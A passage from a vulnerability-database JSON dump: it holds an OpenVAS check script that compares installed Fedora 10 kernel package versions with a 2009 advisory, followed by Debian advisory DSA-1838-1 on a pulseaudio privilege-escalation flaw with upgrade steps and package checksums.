rpm:\"kernel-smp~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:40", "description": "The remote host is missing an update to the kernel\nannounced via advisory FEDORA-2009-13098.", "cvss3": {}, "published": "2009-12-14T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-13098 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3621", "CVE-2009-3638", "CVE-2009-4005", "CVE-2008-5079", "CVE-2009-3080", "CVE-2009-3547", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-3620", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-4031", "CVE-2009-3612", "CVE-2009-2847"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:66509", "href": "http://plugins.openvas.org/nasl.php?oid=66509", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13098.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13098 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.41:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.39\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.40\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.41\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13098\";\ntag_summary = \"The remote host is missing an update to the kernel\nannounced via advisory FEDORA-2009-13098.\";\n\n\n\nif(description)\n{\n script_id(66509);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-4031\", \"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-3080\", \"CVE-2009-4005\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-13098 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539414\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539435\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=541160\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2023-05-02T17:16:28", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1838-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 18, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : pulseaudio\nVulnerability : privilege escalation\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2009-1894\nDebian Bug : 537351\n\nTavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1.tar.gz\n Size/MD5 checksum: 1098761 e965d6170caf1b816a51e490f8bb8f49\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1.dsc\n Size/MD5 checksum: 2302 982ec7228b8b5e2429be61e601f9be78\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 70102 d25d7e00b3abd0d6db30f367b2c1588c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 80650 662d3cc6c33797509981c86aa2afa33f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 198044 636571c01f35464050c342763ecd4743\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 383882 2ba1337b6e4b6e63972a63a5cd28c8b7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 68744 91d11ae4e02af5e5cbc055abe9a3b28c\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 407796 9d7f897db38e9ba8eaa0d043ae0714e8\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 69618 ca807ed9ee62e4df968482c0d3207def\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 66140 d92032d26f5dfbecd48d01727d15b05a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 58652 993367567f24558d9a23fa741254dd42\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 82050 c2a27269fe5c81c1b449f6cb03f0baec\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 68054 2aaf0fc7b38718792714ebbce7316b2d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 98628 ec19c6873cf7e7dc181153a63c74a749\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 64750 8a8e9f168dfd19cea9fa22df2fd0e3d8\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 77078 12ebdb1d926f8aa27734b38078e2d91c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 104850 288ec4e4329c75bb5af5ad0d81064273\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 93578 85d609a4e77fde9c1df8b5b63bd63817\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 283052 7c3bad69fba8d3e7adbaaa97771264b7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 101092 49a121ce404a243d7680960ed1e7c208\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 77628 05882b2d52ee396635383ad55e2ba420\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 348766 8e91301ccd66e2405a3b48f040a85216\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 196348 8bf48d9f9d4c090267406cce581a872f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 89626 321fd09fc9e9a4bbf447f085e0a8adee\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 475124 9aecea47e87d08e5b36da03ae145df7a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 62178 c2f3ae39e3c304e1ff8f81393ed84876\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 251952 3b899b007f39b4427e4cf87ee82caecb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 80964 acc9df7332e9177239454f336582bbfa\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 668000 863fac4de007c536f53888599f68c001\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 284080 75721adbd8ca45a55d194fb70cc753d1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 69730 133722438a5b04cfcfbed1e79b62c0b5\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 64780 537e15d120beabb902d05d4cc1580fd3\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 61746 322611ca3ee37465c9619b504d8bc694\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 77548 1895e0bae241281228033ae65787b243\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 411662 18289bef8448fe46a2b7cab9bed2673b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 78244 593e4f3767c5f4a40623cba3dcd016bb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 70674 51294f2a9247d949c2bc5e780e4fb5ec\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 386530 e5901088f7fa33bb1524ca0cdb75bae4\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 100300 8cd949dc9c5f3c214ec7f2567c18f741\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 260996 5f1c5820feb1eb29230d04cf1868b596\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 95028 cc25475063a588489c8f331ad1db688c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 81842 a7557ed08474c226bb90263717eeeeb8\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 187364 42178f0f4dcd7d9d749af442f95086bf\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 98844 fd73f26f91e2a0803580730b821551fc\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 211228 48848026f36e5308836598a3641e0c51\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 58396 2ea48470f03b1076f2726e8144232642\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 80828 a313f4b81345c5332e9fd35af9aa8125\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 344806 ecb905673ace304c8bd83ec3c6eb2c82\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 90500 1361c331c83d87d2a47df25c47dbad05\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 68582 3d69d6c2075b6aad90606ab61d977f83\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 81122 f2d3aed1dc837ff24dced6d4c6de2954\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 68302 5f6ecbcdde78563fac6dabaf87c8f5ce\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 659782 e870bf806cc2491d946c8d4313aa60e7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 364442 df0204d1a502cc599b1bfc1901aa3b25\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 100702 817782d13f14b5fde26a25997111ab33\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 65870 dbfe1787dd10217e793884b1a8731896\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 94408 82695cdc7ca6161e295775aeea532945\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 57882 ac74c8cbb4b3b4417345d606180f0144\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 76132 5b35e4160e49fe3fd2ddc23a808c21e8\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 344618 a5131166ae2ec69597f7b54b5a24a3a0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 88702 4915d34e8e8e92431c9f7643d91477cd\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 74448 8b08fecd75aa9de32410f5016c2306bd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 67678 126477124754818db2469b0c678ac0d1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 274428 f7849b6a736079fb7fe629d696d802e2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 67576 65804749628ab6876f40163ee9282585\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 68220 106e6628c09a4913b8d563ed40b7661b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 60644 74578075ef3a1e187ecaaa2e9b4b78db\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 315492 ce351041457590af270e28d434750c67\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 78816 27411606d41c943fe084a7de02c4e00e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 100498 6bae6db09505a76bfd9a90d6f29230ed\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 103782 6a92b357651c257ab2e827ba150d1717\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 169296 36e691ffad526d037ae93922a83f4e91\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 184716 81909d6eaac40a6988ade5e21e0d021d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 233750 de9e3dd980787a7b243492454b565b8f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 66000 1d5864792a151b1ed054a7211eef6322\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 409580 6e92f4c213e7a93c90b5e84d94eaaaaa\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 342726 94a196eaa580b1fa6789cdd697a448bb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 64730 7e42ea8e7e11455540f58749aa2d257f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 64358 c6e956995d19645e3f1ccf0f6683fb0d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 75122 34b94a6c7ffdb811e65681a57f74501c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 78954 4049096048b27a2c287525744617212c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 659796 156fa9c95bbadd7a5fee8f589ff2a89b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 98114 73124970da1d9ca3cd097b569bf0b512\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 66420 b4ded302d4185e611c584da489ce22fb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 71108 1cb856d4f35679fcf1a677695d945da1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 64412 90431dfe3f162f0c06bc5fa94d3404df\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 79576 0c93b66527f4b8806bef5045464af6e4\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 82798 09df90d841d768ae855939955db4abda\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 75196 7a65abd7466b47348cfd69a7b2c4b705\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 97452 d04827e5b986f6d621da1f88803025c2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 79118 585de1c54d257968c241fa8851641f4f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 67696 cf50a6fe39b759e95ba4a2f254f720ff\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 68578 881a6f37341f06ac8d7027b8b094e487\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 390604 0cecbfb4894821a6830f3521f5f8ec67\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 58936 3dd0f5b91de0091cf8aecbcc6c75eb91\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 88392 877050476a971078672ca11cab7ff82c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 394820 e686ca194c91196d71205b4bc9b5494e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 411000 0dc889c3a2f2c4896ab24af4be5bfd1c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 